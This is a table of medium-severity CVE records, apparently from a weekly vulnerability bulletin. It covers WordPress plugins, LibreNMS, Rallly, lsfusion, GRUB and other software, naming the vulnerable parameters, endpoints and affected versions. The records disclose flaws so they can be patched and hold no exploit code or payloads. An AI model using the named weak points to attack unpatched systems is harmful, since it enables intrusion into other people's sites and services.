| kurudrive--VK All in One Expansion Unit | The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' parameters in all versions up to, and including, 9.112.1. This is due to a logic error in the CTA save function that reads sanitization callbacks from the wrong variable ($custom_field_name instead of $custom_field_options), causing the sanitization to never be applied. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute when a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-11265 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9e5a6158-03d4-4ac7-8a4b-666cedabb433?source=cve https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/class-vk-call-to-action.php#L198 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/block/index.php#L259 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/block/index.php#L271 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394731%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=#file2   |
| kurudrive--VK All in One Expansion Unit | The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_veu_custom_css' parameter in all versions up to, and including, 9.112.1. This is due to insufficient input sanitization and output escaping on the user-supplied Custom CSS value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-11267 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8996a0f0-8a49-4310-917b-62172c12afdb?source=cve https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/admin/class-veu-metabox.php#L178 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/css-customize/css-customize-single.php#L32 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3393317%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=   |
| kwmanagement--Pet-Manager Petfinder | The Pet-Manager - Petfinder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the kwm-petfinder shortcode in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-12710 | https://www.wordfence.com/threat-intel/vulnerabilities/id/35b0d959-2adb-4de4-b51b-1bfead49bc7d?source=cve https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L133 https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L163 https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L164 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396792%40tier-management-petfinder&new=3396792%40tier-management-petfinder&sfp_email=&sfph_mail=   |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. In versions from 2.95.0 to before 2.95.12 and from 3.17.0 to before 3.131.0, in SSO provider configurations without an explicit AUTH_<PROVIDER>_CHECK setting, a potential account takeover may happen if an authenticated user is made to call a specifically crafted URL via a CSRF or phishing attack. This issue has been patched in versions 2.95.12 and 3.131.0. A workaround for this issue involves setting AUTH_<PROVIDER>_CHECK. | 2025-11-21 | 6.5 | CVE-2025-65107 | https://github.com/langfuse/langfuse/security/advisories/GHSA-w9pw-c549-5m6w   |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a reflected cross-site scripting (XSS) vulnerability was identified in the LibreNMS application at the /maps/nodeimage endpoint. The Image Name parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim's browser. This issue has been patched in version 25.11.0. | 2025-11-18 | 6.2 | CVE-2025-65013 | https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x   |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a boolean-based blind SQL injection vulnerability was identified in the LibreNMS application at the /ajax_output.php endpoint. The hostname parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. This issue has been patched in version 25.11.0. | 2025-11-18 | 5.5 | CVE-2025-65093 | https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9   |
| lightgalleryteam--LightGallery WP | Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-20 | 6.4 | CVE-2025-5092 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acaa3142-2bbc-43d3-8ecc-05e8edb931ec?source=cve https://github.com/sachinchoolur/lightGallery https://plugins.trac.wordpress.org/changeset/3311382/ https://plugins.trac.wordpress.org/changeset/3356089/ https://plugins.trac.wordpress.org/changeset/3372141/ https://plugins.trac.wordpress.org/changeset/3343557/   |
| lsfusion--platform | A weakness has been identified in lsfusion platform up to 6.1. This vulnerability affects the function unpackFile of the file server/src/main/java/lsfusion/server/physics/dev/integration/external/to/file/ZipUtils.java. This manipulation causes path traversal. It is possible to initiate the attack remotely. | 2025-11-17 | 6.3 | CVE-2025-13265 | VDB-332600 \| lsfusion platform ZipUtils.java unpackFile path traversal VDB-332600 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689427 \| lsFusion 6.1 Arbitrary File Overwrite and Deletion https://github.com/lsfusion/platform/issues/1545   |
| lsfusion--platform | A vulnerability was found in lsfusion platform up to 6.1. Affected is the function DownloadFileRequestHandler of the file web-client/src/main/java/lsfusion/http/controller/file/DownloadFileRequestHandler.java. Performing manipulation of the argument Version results in path traversal. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-11-17 | 5.3 | CVE-2025-13261 | VDB-332596 \| lsfusion platform DownloadFileRequestHandler.java DownloadFileRequestHandler path traversal VDB-332596 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689412 \| lsFusion 6.1 Unauthorized Arbitrary File Read https://github.com/lsfusion/platform/issues/1543 https://github.com/lsfusion/platform/issues/1543#issue-3576922131   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability in the poll duplication endpoint (/api/trpc/polls.duplicate) allows any authenticated user to duplicate polls they do not own by modifying the pollId parameter. This effectively bypasses access control and lets unauthorized users clone private or administrative polls. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65020 | https://github.com/lukevella/rallly/security/advisories/GHSA-44w7-pf32-gv5m https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to modify other participants' votes in polls without authorization. The backend relies solely on the participantId parameter to identify which votes to update, without verifying ownership or poll permissions. This allows an attacker to alter poll results in their favor, directly compromising data integrity. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65028 | https://github.com/lukevella/rallly/security/advisories/GHSA-pchc-v5hg-f5gp https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization flaw in the comment creation endpoint allows authenticated users to impersonate any other user by altering the authorName field in the API request. This enables attackers to post comments under arbitrary usernames, including privileged ones such as administrators, potentially misleading other users and enabling phishing or social engineering attacks. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65031 | https://github.com/lukevella/rallly/security/advisories/GHSA-hhfc-6gq7-rrpm https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability allows any authenticated user to change the display names of other participants in polls without being an admin or the poll owner. By manipulating the participantId parameter in a rename request, an attacker can modify another user's name, violating data integrity and potentially causing confusion or impersonation attacks. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65032 | https://github.com/lukevella/rallly/security/advisories/GHSA-q9m7-chfx-43xw https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| macrozheng--mall | A vulnerability was detected in macrozheng mall up to 1.0.3. Affected by this issue is the function delete of the file /member/readHistory/delete. Performing manipulation of the argument ids results in improper access controls. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-11-20 | 5.4 | CVE-2025-13443 | VDB-333016 \| macrozheng mall delete access control VDB-333016 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690892 \| mall <=1.0.3 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/15   |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. In ClipBucket version 5.5.2, a change to network.class.php causes the application to dynamically build the server URL from the incoming HTTP Host header when the configuration base_url is not set. Because Host is a client-controlled header, an attacker can supply an arbitrary Host value. This allows an attacker to cause password-reset links (sent by forget.php) to be generated with the attacker's domain. If a victim follows that link and enters their activation code on the attacker-controlled domain, the attacker can capture the code and use it to reset the victim's password and take over the account. This issue has been patched in version 5.5.2#162. | 2025-11-20 | 6.8 | CVE-2025-62709 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-xhhf-mpqr-2cq5 https://github.com/MacWarrior/clipbucket-v5/commit/1a93532e665217b5d329808ca78e37e59e9f8a9d   |
| Microsoft--Visual Studio Code | Improper access control in GitHub Copilot and Visual Studio Code allows an authorized attacker to bypass a security feature over a network. | 2025-11-20 | 5.7 | CVE-2025-64660 | GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability   |
| MongoDB--C Driver | A mongoc_bulk_operation_t may read invalid memory if large options are passed. | 2025-11-18 | 6.8 | CVE-2025-12119 | https://github.com/mongodb/mongo-php-driver/releases/tag/1.21.2 https://github.com/mongodb/mongo-c-driver/releases/tag/1.30.6 https://github.com/mongodb/mongo-c-driver/releases/tag/2.1.2   |
| n/a--libvirt | A flaw was found in libvirt. External inactive snapshots for shut-down VMs are incorrectly created as world-readable, making it possible for unprivileged users to inspect the guest OS contents. This results in an information disclosure vulnerability. | 2025-11-17 | 5.5 | CVE-2025-13193 | https://access.redhat.com/security/cve/CVE-2025-13193 |
| nalam-1--Magical Products Display Elementor WooCommerce Widgets \| Product Sliders, Grids & AJAX Search | The Magical Products Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mpdpr_title_tag' and 'mpdpr_subtitle_tag' parameters in the MPD Pricing Table widget in all versions up to, and including, 1.1.29 due to insufficient input sanitization and output escaping on user-supplied HTML tag names. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12964 | https://www.wordfence.com/threat-intel/vulnerabilities/id/758e23b9-c3d5-4f1c-9659-66483d6f0578?source=cve https://plugins.trac.wordpress.org/browser/magical-products-display/tags/1.1.29/includes/widgets/pricing-table.php#L2149 https://plugins.trac.wordpress.org/browser/magical-products-display/tags/1.1.29/includes/widgets/pricing-table.php#L2167 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394768%40magical-products-display&new=3394768%40magical-products-display&sfp_email=&sfph_mail=   |
| nikolayyordanov--Like-it | The Like-it plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the likeit_conf() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ad1d9f5-c224-4d28-8d73-439b3c5ca24f?source=cve https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/like-it.php#L130 https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/like-it.php#L131 https://plugins.trac.wordpress.org/browser/like-it/tags/2.2/tpl/config.php#L37   |
| ninjateam--WP Duplicate Page | The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information. | 2025-11-18 | 4.3 | CVE-2025-12481 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61105f6a-1bd7-415d-9481-a1c2c310f778?source=cve https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Page/Settings.php#L92 https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Classes/ButtonDuplicate.php#L137 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394773%40wp-duplicate-page%2Ftrunk&old=3386144%40wp-duplicate-page%2Ftrunk&sfp_email=&sfph_mail=   |
| NixOS--nixpkgs | NixOS's Onlyoffice is a software suite that offers online and offline tools for document editing, collaboration, and management. In versions from 22.11 to before 25.05 and versions before Unstable 25.11, a hard-coded secret was used in the NixOS module for the OnlyOffice document server to protect its file cache. An attacker with knowledge of an existing revision ID could use this secret to obtain a document. In practice, an arbitrary revision ID should be hard to obtain. The primary impact is likely the access to known documents from users with expired access. This issue was resolved in NixOS unstable version 25.11 and version 25.05. | 2025-11-17 | 5.3 | CVE-2025-64766 | https://github.com/NixOS/nixpkgs/security/advisories/GHSA-58m4-5wg3-5g5v https://github.com/NixOS/nixpkgs/pull/462100 https://github.com/NixOS/nixpkgs/pull/462204 https://github.com/NixOS/nixpkgs/commit/8e74d05e3de4ee5ad320cd585a7e0f12a4730869 https://github.com/NixOS/nixpkgs/commit/cec38dec00df26a901eb8b424d53bbb3bcc72eec   |
| open-formulieren--open-forms | Open Forms allows users create and publish smart forms. Prior to versions 3.2.7 and 3.3.3, forms where the prefill data fields are dynamically set to readonly/disabled can be modified by malicious users deliberately trying to modify data they're not supposed to. For regular users, the form fields are marked as readonly and cannot be modified through the user interface. This issue has been patched in versions 3.2.7 and 3.3.3. | 2025-11-18 | 4.3 | CVE-2025-64515 | https://github.com/open-formulieren/open-forms/security/advisories/GHSA-cp63-63mq-5wvf https://github.com/open-formulieren/open-forms/blob/bcf2dc54c695fb7c8c58712627d82c4b766248b6/CHANGELOG.rst#327-2025-11-18 https://github.com/open-formulieren/open-forms/blob/bcf2dc54c695fb7c8c58712627d82c4b766248b6/CHANGELOG.rst#333-2025-11-18   |
| Opto22--GRV-EPIC-PR1 | A vulnerability exists in the Opto22 Groov Manage REST API on GRV-EPIC and groov RIO Products that allows remote code execution with root privileges. When a POST request is executed against the vulnerable endpoint, the application reads certain header details and unsafely uses these values to build commands, allowing an attacker with administrative privileges to inject arbitrary commands that execute as root. | 2025-11-20 | 6.2 | CVE-2025-13087 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-03 https://www.opto22.com/support/resources-tools/knowledgebase/kb91326 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-03.json   |
| OSC--ondemand | Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, users can craft a "Time of Check to Time of Use" (TOCTOU) attack when downloading zip files to access files outside of the OOD_ALLOWLIST. This vulnerability impacts sites that use the file browser allowlists in all current versions of OOD. However, files accessed are still protected by the UNIX permissions. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability. | 2025-11-20 | 4.3 | CVE-2025-62724 | https://github.com/OSC/ondemand/security/advisories/GHSA-vjpg-34px-gjrw   |
| pluginsGLPI--databaseinventory | pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3. | 2025-11-18 | 4.3 | CVE-2025-53360 | https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-5j5j-xr62-jr58 https://github.com/pluginsGLPI/databaseinventory/commit/0a376a0c6f4142e11ea518faefe95c01b176fd87 https://github.com/pluginsGLPI/databaseinventory/commit/7dcad1efb6ee84e9cffb3b446cdb47dc0be1091e https://github.com/pluginsGLPI/databaseinventory/commit/e9d4474acdab4141a6f4798cdd406b0d04480269   |
| powerblogservice--AuthorSure | The AuthorSure plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the 'authorsure' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-13134 | https://www.wordfence.com/threat-intel/vulnerabilities/id/81070529-b269-44b0-8f21-b08add63a099?source=cve https://drive.google.com/file/d/1ZVmQSyjgRxNVGef7Zkzdws8kLraxOt59/view?pli=1   |
| Progress--MOVEit Transfer | Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer. This issue affects MOVEit Transfer: before 2024.1.8, from 2025.0.0 before 2025.0.4. | 2025-11-19 | 5.3 | CVE-2025-13147 | https://docs.progress.com/bundle/moveit-transfer-release-notes-2024/page/Fixed-Issues-in-2024.1.8.html https://docs.progress.com/bundle/moveit-transfer-release-notes-2025/page/Fixed-Issues-in-2025.0.4.html https://docs.progress.com/bundle/moveit-transfer-release-notes-2025_1/page/Fixed-Issues-in-2025.1.html   |
| projectworlds--Advanced Library Management System | A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /add_member.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-11-17 | 6.3 | CVE-2025-13254 | VDB-332589 \| projectworlds Advanced Library Management System add_member.php sql injection VDB-332589 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #687854 \| projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/Wyg2002yx/cve/blob/main/002/report.md   |
| projectworlds--Advanced Library Management System | A security flaw has been discovered in projectworlds Advanced Library Management System 1.0. This issue affects some unknown processing of the file /book_search.php. Performing manipulation of the argument book_pub/book_title results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13255 | VDB-332590 \| projectworlds Advanced Library Management System book_search.php sql injection VDB-332590 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #687855 \| projectworlds Advanced Library Management System 1.0 SQL Injection Submit #687857 \| projectworlds Advanced Library Management System 1.0 SQL Injection (Duplicate) https://github.com/Wyg2002yx/cve/blob/main/003/report.md https://github.com/Wyg2002yx/cve/blob/main/004/report.md   |
| projectworlds--Advanced Library Management System | A weakness has been identified in projectworlds Advanced Library Management System 1.0. Impacted is an unknown function of the file /borrow.php. Executing manipulation of the argument roll_number can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13256 | VDB-332591 \| projectworlds Advanced Library Management System borrow.php sql injection VDB-332591 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #687856 \| projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/Wyg2002yx/cve/blob/main/005/report.md   |
| projectworlds--Advanced Library Management System | A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Impacted is an unknown function of the file /borrowed_book_search.php. Such manipulation of the argument datefrom/dateto leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13278 | VDB-332613 \| projectworlds Advanced Library Management System borrowed_book_search.php sql injection VDB-332613 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690797 \| projectworlds Advanced Library Management System 1.0 SQL Injection https://github.com/CH0ico/CVE_choco_1/blob/master/report.md   |
| projectworlds--can pass malicious payloads | A security flaw has been discovered in projectworlds can pass malicious payloads up to 1.0. This vulnerability affects unknown code of the file /add_book.php. The manipulation of the argument image results in unrestricted upload. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-11-23 | 6.3 | CVE-2025-13573 | VDB-333337 \| projectworlds can pass malicious payloads add_book.php unrestricted upload VDB-333337 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698646 \| projectworlds Advanced Library Management System V1.0 Unrestricted Upload https://github.com/GYSakura/tmp75/blob/main/report.md   |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the "saveFutureActionData" function in all versions up to, and including, 4.9.1. This makes it possible for authenticated attackers, with author level access and above, to change the status of arbitrary posts and pages via the REST API endpoint. | 2025-11-21 | 4.3 | CVE-2025-13149 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82ea0ebc-08aa-4ef5-b6b1-c7c13715ef6d?source=cve https://github.com/publishpress/publishpress-future/commit/0cbefc1632c6f1fffc5fa0ca85e6b8a641d41c7f   |
| qzzr--Pollcaster Shortcode Plugin | The Pollcaster Shortcode Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' parameter in the 'pollcaster' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12661 | https://www.wordfence.com/threat-intel/vulnerabilities/id/120ba9e5-9594-4a4f-b475-ef3fcf5f4565?source=cve https://wordpress.org/plugins/pollcaster-shortcode/ https://plugins.trac.wordpress.org/browser/pollcaster-shortcode/tags/1.0/pollcaster.php#L33   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB2 bootloader's network module that poses an immediate Denial of Service (DoS) risk. This flaw is a Use-after-Free issue, caused because the net_set_vlan command is not properly unregistered when the network module is unloaded from memory. An attacker who can execute this command can force the system to access memory locations that are no longer valid. Successful exploitation leads directly to system instability, which can result in a complete crash and halt system availability. | 2025-11-18 | 4.9 | CVE-2025-54770 | https://access.redhat.com/security/cve/CVE-2025-54770 RHBZ#2413813   |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free vulnerability has been identified in the GNU GRUB (Grand Unified Bootloader). The flaw occurs because the file-closing process incorrectly retains a memory pointer, leaving an invalid reference to a file system structure. An attacker could exploit this vulnerability to cause grub to crash, leading to a Denial of Service. Possible data integrity or confidentiality compromise is not discarded. | 2025-11-18 | 4.9 | CVE-2025-54771 | https://access.redhat.com/security/cve/CVE-2025-54771 RHBZ#2413823   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB (Grand Unified Bootloader) component. This flaw occurs because the bootloader mishandles string conversion when reading information from a USB device, allowing an attacker to exploit inconsistent length values. A local attacker can connect a maliciously configured USB device during the boot sequence to trigger this issue. A successful exploitation may lead GRUB to crash, leading to a Denial of Service. Data corruption may be also possible, although given the complexity of the exploit the impact is most likely limited. | 2025-11-18 | 4.8 | CVE-2025-61661 | https://access.redhat.com/security/cve/CVE-2025-61661 RHBZ#2413827   |
| Red Hat--Red Hat Enterprise Linux 10 | A Use-After-Free vulnerability has been discovered in GRUB's gettext module. This flaw stems from a programming error where the gettext command remains registered in memory after its module is unloaded. An attacker can exploit this condition by invoking the orphaned command, causing the application to access a memory location that is no longer valid. An attacker could exploit this vulnerability to cause grub to crash, leading to a Denial of Service. Possible data integrity or confidentiality compromise is not discarded. | 2025-11-18 | 4.9 | CVE-2025-61662 | https://access.redhat.com/security/cve/CVE-2025-61662 RHBZ#2414683   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in the GRUB2 bootloader's normal command that poses an immediate Denial of Service (DoS) risk. This flaw is a Use-after-Free issue, caused because the normal command is not properly unregistered when the module is unloaded. An attacker who can execute this command can force the system to access memory locations that are no longer valid. Successful exploitation leads directly to system instability, which can result in a complete crash and halt system availability. Impact on the data integrity and confidentiality is also not discarded. | 2025-11-18 | 4.9 | CVE-2025-61663 | https://access.redhat.com/security/cve/CVE-2025-61663 RHBZ#2414684   |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability in the GRUB2 bootloader has been identified in the normal module. This flaw, a memory Use After Free issue, occurs because the normal_exit command is not properly unregistered when its related module is unloaded. An attacker can exploit this condition by invoking the command after the module has been removed, causing the system to improperly access a previously freed memory location. This leads to a system crash or possible impacts in data confidentiality and integrity. | 2025-11-18 | 4.9 | CVE-2025-61664 | https://access.redhat.com/security/cve/CVE-2025-61664 RHBZ#2414685   |
| rometheme--RTMKit | The RTMKit Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion Block's attributes in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-8609 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a4601d9e-02bb-4b27-b16e-7cfc0fc19919?source=cve https://plugins.trac.wordpress.org/browser/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php#L1032 https://plugins.trac.wordpress.org/changeset/3369481/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php   |
| rsync--rsync | A malicious client acting as the receiver of an rsync file transfer can trigger an out-of-bounds read of a heap-based buffer, via a negative array index. The malicious rsync client requires at least read access to the remote rsync module in order to trigger the issue. | 2025-11-18 | 4.3 | CVE-2025-10158 | https://github.com/RsyncProject/rsync/commit/797e17fc4a6f15e3b1756538a9f812b63942686f https://attackerkb.com/assessments/fbacb2a6-d1cd-4011-bb3a-f06b1c8306b1   |
| Rumpus--FTP Server | CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | 2025-11-17 | 6.8 | CVE-2025-55055 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | Multiple CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-11-17 | 4.8 | CVE-2025-55056 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | Multiple CWE-352 Cross-Site Request Forgery (CSRF) | 2025-11-17 | 4.5 | CVE-2025-55057 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | CWE-20 Improper Input Validation | 2025-11-17 | 4.5 | CVE-2025-55058 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| Rumpus--FTP Server | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-11-17 | 4.8 | CVE-2025-55059 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |
| rustaurius--Affiliate AI Lite | The Affiliate AI Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'asin' shortcode attribute in the affiai_img shortcode in all versions up to, and including, 1.0.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11799 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b05f4ef4-aa64-4cf4-a278-604df8407d12?source=cve https://plugins.trac.wordpress.org/browser/affiliate-ai-lite/tags/1.0.1/includes/afx-img.php#L53 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399153%40affiliate-ai-lite&new=3399153%40affiliate-ai-lite   |
| rustybadrobot--Display Pages Shortcode | The Display Pages Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'column_count' parameter in the [display-pages] shortcode in all versions up to, and including, 1.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11763 | https://www.wordfence.com/threat-intel/vulnerabilities/id/df4ada5f-6008-40b9-ad83-c6af82e64e9f?source=cve https://plugins.trac.wordpress.org/browser/display-pages-shortcode/trunk/display-pages-shortcode.php#L513 https://plugins.trac.wordpress.org/browser/display-pages-shortcode/trunk/display-pages-shortcode.php#L517   |
